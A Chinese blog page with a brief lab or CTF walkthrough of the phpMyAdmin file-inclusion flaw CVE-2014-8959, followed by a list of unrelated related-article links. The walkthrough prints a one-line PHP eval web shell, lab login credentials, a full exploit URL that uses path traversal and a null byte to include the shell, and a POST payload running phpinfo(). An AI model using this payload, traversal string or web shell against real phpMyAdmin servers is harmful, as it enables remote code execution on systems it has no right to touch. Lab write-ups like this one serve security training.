当前位置: 首页 > article >正文

phpmyadmin 文件包含(CVE-2014-8959)

目录

漏洞描述

1.攻击机配置go环境:

2.点击“数据库”抓包token值

3.拿到flag:


漏洞描述

        phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 访问http://ip:port/pma即可进入phpmyadmin。http://ip:port/下有测试账号密码,包含根目录下1.gif,其内容为:<?php@eval($_POST[a]);?>。

1.攻击机配置go环境

登陆页面 /pma/gis_data_editor.php
用户名密码登陆pmatest/pmatest

2.点击“数据库”抓包token值

3.拿到flag

http://193.168.0.45:26133/pma/gis_data_editor.php?token=9f2b0206507afb8de01d4197bfa90a37&&gis_data[gis_type]=/../../../../1.gif%00

a=phpinfo();


http://www.kler.cn/a/555043.html

相关文章:

  • 微信小程序实现拉卡拉支付
  • 《鸿蒙开发-答案之书》获取视频第一帧和视频时间
  • 深度学习-4.优化与正则化
  • 亲测可用,IDEA中使用满血版DeepSeek R1!支持深度思考!免费!免配置!
  • 第1章大型互联网公司的基础架构——1.11 消息中间件技术
  • android 使用 zstd算法压缩文件
  • 数仓搭建(hive):DWS层(服务数据层)
  • Ubuntu 20.04源码安装opencv 4.5.0
  • 视频图像质量评价开源算法介绍【持续更新】
  • 有向图的强连通分量: Kosaraju算法和Tarjan算法详解
  • MapReduce理论知识与实践
  • ESXI 8.0 linux vSphere Client service has stopped working.手动启动服务
  • BS架构网络安全 网络安全架构分析
  • UI学习备忘
  • 第1章 快速认识线程
  • 用deepseek学大模型05逻辑回归
  • 在 Python 中操作 Excel 文件
  • 将RocketMQ集成到了Spring Boot项目中,实现站内信功能
  • Java中Map循环安全的删除数据的4中方法
  • 循环神经网络RNN原理与优化